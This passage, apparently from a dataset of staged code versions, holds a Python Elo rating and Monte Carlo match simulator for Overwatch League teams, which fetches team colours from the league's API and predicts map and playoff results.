self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n 
self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, 
team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n 
self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-3": "<mask token>\nstart_elo = 0\ndecay_factor = 0.9\nk = 30\nd = 200\noverall_weight = 0.6\nmaptype_weight = 0.2\nmapname_weight = 0.2\nteams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN',\n 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS'\n ]\nmaptypes = ['control', 'assault', 'hybrid', 'escort']\nmapnames = ['Havana', 
'temple-of-anubis', 'kings-row', 'hanamura',\n 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal',\n 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto',\n 'busan', 'paris']\npostseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony',\n 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row',\n 'dorado', 'gibraltar', 'rialto']\ncolorrequests = requests.get('https://api.overwatchleague.com/teams',\n timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n 
self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = 
t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n 
if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 
= 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n 
mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-4": "import json, requests, math, random\nstart_elo = 0\ndecay_factor = 0.9\nk = 30\nd = 200\noverall_weight = 0.6\nmaptype_weight = 0.2\nmapname_weight = 0.2\nteams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN',\n 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS'\n ]\nmaptypes = ['control', 'assault', 'hybrid', 'escort']\nmapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura',\n 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal',\n 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto',\n 'busan', 'paris']\npostseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony',\n 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 'kings-row',\n 'dorado', 'gibraltar', 'rialto']\ncolorrequests = requests.get('https://api.overwatchleague.com/teams',\n timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\n\nclass EloCalculations:\n\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor'\n ], '#' + c['secondaryColor']]\n self.matchdata = json.loads(open('data.json', 'r').read())\n self.overall_elos = {t: start_elo for t in teams}\n self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams\n }\n self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams\n }\n self.elorecords = {t: [[], [], [], []] for t in teams}\n self.stage4played = {t: (0) for t in teams}\n self.map_draws = {m: [0, 0] for m in mapnames}\n 
self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams}\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t: season.overall_elos[t] for t in teams}\n self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in\n maptypes} for t in teams}\n self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in\n mapnames} for t in teams}\n self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1\n ]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n self.standings = {t: {'w': season.standings[t]['w'], 'l': season.\n standings[t]['l'], 'd': season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t] *= decay_factor\n for m in mapnames:\n self.mapname_elos[t][m] *= decay_factor\n for m in maptypes:\n self.maptype_elos[t][m] *= decay_factor\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams:\n self.elorecords[t][i].append(self.overall_elos[t])\n for match in (stage['regular'] + stage['playoffs']):\n if not match['completed']:\n continue\n t1, t2 = match['t1'], match['t2']\n if i == 3:\n self.stage4played[t1] += 1\n self.stage4played[t2] += 1\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result'] == 't1']\n ) > len([x for x in match['maps'] if x['result'] ==\n 't2']):\n self.standings[t1]['w'] += 1\n self.standings[t2]['l'] += 1\n else:\n self.standings[t1]['l'] += 1\n self.standings[t2]['w'] += 1\n for map in match['maps']:\n t1_elo = self.overall_elos[t1\n ] * overall_weight + self.mapname_elos[t1][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t1][\n map['maptype']] * maptype_weight\n t2_elo = self.overall_elos[t2\n ] * overall_weight + self.mapname_elos[t2][map[\n 'mapname']] * mapname_weight + self.maptype_elos[t2][\n map['maptype']] * maptype_weight\n exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d))\n exp_t2 = 1 / (1 + 10 
** ((t1_elo - t2_elo) / d))\n act_t1 = 1 if map['result'] == 't1' else 0 if map['result'\n ] == 't2' else 0.5\n act_t2 = 1 if map['result'] == 't2' else 0 if map['result'\n ] == 't1' else 0.5\n self.map_draws[map['mapname']][0\n ] += 1 if act_t1 == 0.5 else 0\n self.map_draws[map['mapname']][1] += 1\n if match in stage['regular']:\n self.standings[t1]['d'] += 1 if map['result'\n ] == 't1' else -1 if map['result'] == 't2' else 0\n self.standings[t2]['d'] += 1 if map['result'\n ] == 't2' else -1 if map['result'] == 't1' else 0\n MoV = 1\n elo_dif = 0\n if act_t1 == 1:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif act_t2 == 1:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1)\n elo_dif = t1_elo - t2_elo\n elif t1_elo > t2_elo:\n MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1)\n elo_dif = t2_elo - t1_elo\n self.margins_of_victory.append(MoV)\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map['maptype']] += t1_change\n self.mapname_elos[t1][map['mapname']] += t1_change\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map['maptype']] += t2_change\n self.mapname_elos[t2][map['mapname']] += t2_change\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self, name):\n types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony',\n 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict.\n fromkeys(['dorado', 'junkertown', 'rialto', 'route-66',\n 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([\n 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row',\n 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios',\n 'lijiang', 'nepal', 'oasis'], 'control')}\n 
return types[name]\n\n def predictMatch(self, team1, team2, maps, loops=10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType, maps))\n for x in range(loops):\n team1score = 0\n team2score = 0\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps\n [i]][1]\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][maps[i]\n ] * mapname_weight + self.maptype_elos[team1][maptypes[i]\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][maps[i]\n ] * mapname_weight + self.maptype_elos[team2][maptypes[i]\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n if random_roll < team1winchance - drawchance / 2:\n team1score += 1\n elif random_roll < team1winchance + drawchance / 2:\n pass\n else:\n team2score += 1\n if team1score == team2score:\n map5 = random.choice([m for m in ['ilios', 'busan',\n 'lijiang'] if m not in maps])\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.maptype_elos[team1]['control'\n ] * maptype_weight + self.mapname_elos[team1][map5\n ] * mapname_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.maptype_elos[team2]['control'\n ] * maptype_weight + self.mapname_elos[team2][map5\n ] * mapname_weight\n if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)):\n team1score += 1\n else:\n team2score += 1\n scoreline = '{}-{}'.format(team1score, team2score)\n if scoreline not in results:\n results[scoreline] = 0\n results[scoreline] += 1\n if team1score > team2score:\n team1wins += 1\n results = {s: (results[s] / loops) for s in results}\n return results, team1wins / loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular',\n updateelos=True, firstto=4):\n \"\"\"\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n \"\"\"\n types = [self.getMapType(m) for m in maps]\n score = [0, 0]\n\n def 
simulateMap(mapname, maptype):\n elo1 = self.overall_elos[team1\n ] * overall_weight + self.mapname_elos[team1][mapname\n ] * mapname_weight + self.maptype_elos[team1][maptype\n ] * maptype_weight\n elo2 = self.overall_elos[team2\n ] * overall_weight + self.mapname_elos[team2][mapname\n ] * mapname_weight + self.maptype_elos[team2][maptype\n ] * maptype_weight\n random_roll = random.random()\n team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1\n ] * min(team1winchance, 1 - team1winchance) * 2\n if random_roll < team1winchance - drawchance / 2:\n act_t1, act_t2 = 1, 0\n elif random_roll < team1winchance + drawchance / 2:\n act_t1, act_t2 = 0.5, 0.5\n else:\n act_t1, act_t2 = 0, 1\n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d))\n exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d))\n if act_t1 == 1:\n elo_dif = elo1 - elo2\n elif act_t2 == 1:\n elo_dif = elo2 - elo1\n elif elo1 > elo2:\n elo_dif = elo1 - elo2\n elif elo1 > elo2:\n elo_dif = elo2 - elo1\n else:\n elo_dif = 0\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n return round(act_t1), round(act_t2)\n if type == 'regular':\n for i in range(len(maps)):\n score1, score2 = simulateMap(maps[i], types[i])\n score[0] += score1\n score[1] += score2\n if score[0] == score[1]:\n map5 = random.choice([x for x in mapnames if self.\n getMapType(x) == 'control' and x not in maps])\n score1, score2 = simulateMap(map5, 'control')\n score[0] += score1\n score[1] += score2\n if score[0] > score[1]:\n self.standings[team1]['w'] += 1\n 
self.standings[team2]['l'] += 1\n else:\n self.standings[team1]['l'] += 1\n self.standings[team2]['w'] += 1\n self.standings[team1]['d'] += score[0] - score[1]\n self.standings[team2]['d'] += score[1] - score[0]\n if type == 'playoffs':\n mappreferences = {t: {mt: [x for x in postseasonmappool if self\n .getMapType(x) == mt] for mt in maptypes} for t in [team1,\n team2]}\n for t in [team1, team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x: self.\n mapname_elos[t][x] - self.mapname_elos[{team1:\n team2, team2: team1}[t]][x], reverse=True)\n mapprogression = ['control', 'hybrid', 'assault', 'escort']\n scores = [0, 0]\n mnum = 0\n played = []\n picker = team1\n while max(score) < firstto:\n mtype = mapprogression[mnum % 4]\n mname = [m for m in mappreferences[picker][mtype] if m not in\n played][0]\n played.append(mname)\n mnum += 1\n score1, score2 = simulateMap(mname, mtype)\n if score1 == 1:\n picker = team2\n score[0] += 1\n elif score2 == 1:\n picker = team1\n score[1] += 1\n if score[0] > score[1]:\n return [team1, team2]\n else:\n return [team2, team1]\n return\n", "step-5": "import json, requests, math, random\n#import datagatherer\n\n# Constants:\nstart_elo = 0 # Starting elo\ndecay_factor = 0.9 # Decay % between stages\nk = 30 # k for elo change\nd = 200 # Difference in elo for 75% expected WR\noverall_weight = 0.60 # Weigts for different types of elos\nmaptype_weight = 0.20\nmapname_weight = 0.20\n\nteams = ['ATL','BOS','CDH','DAL','FLA','GZC','HZS','HOU','LDN','GLA','VAL','NYE','PAR','PHI','SFS','SEO','SHD','TOR','VAN','WAS']\nmaptypes = ['control','assault','hybrid','escort']\nmapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya',\n 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis',\n 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris']\n\npostseasonmappool = 
['lijiang','ilios','busan','horizon-lunar-colony','temple-of-anubis','hanamura','numbani','eichenwalde',\n 'kings-row','dorado','gibraltar','rialto']\n\ncolorrequests = requests.get(\"https://api.overwatchleague.com/teams\",timeout=10).text\ncolordata = json.loads(colorrequests)['competitors']\n\nclass EloCalculations:\n def __init__(self):\n self.teamcolors = {}\n for teamdata in colordata:\n c = teamdata['competitor']\n self.teamcolors[c['abbreviatedName']]=[\"#\"+c['primaryColor'],\"#\"+c['secondaryColor']]\n\n self.matchdata = json.loads(open(\"data.json\",'r').read())\n\n self.overall_elos = {t:start_elo for t in teams}\n self.maptype_elos = {t:{m:start_elo for m in maptypes} for t in teams}\n self.mapname_elos = {t:{m:start_elo for m in mapnames} for t in teams}\n\n self.elorecords = {t:[[],[],[],[]] for t in teams}\n self.stage4played = {t:0 for t in teams}\n self.map_draws = {m:[0,0] for m in mapnames}\n\n self.standings = {t:{'w':0,'l':0,'d':0} for t in teams}\n\n self.margins_of_victory = []\n\n def makeCopy(self, season):\n self.overall_elos = {t:season.overall_elos[t] for t in teams}\n self.maptype_elos = {t:{m:season.maptype_elos[t][m] for m in maptypes} for t in teams}\n 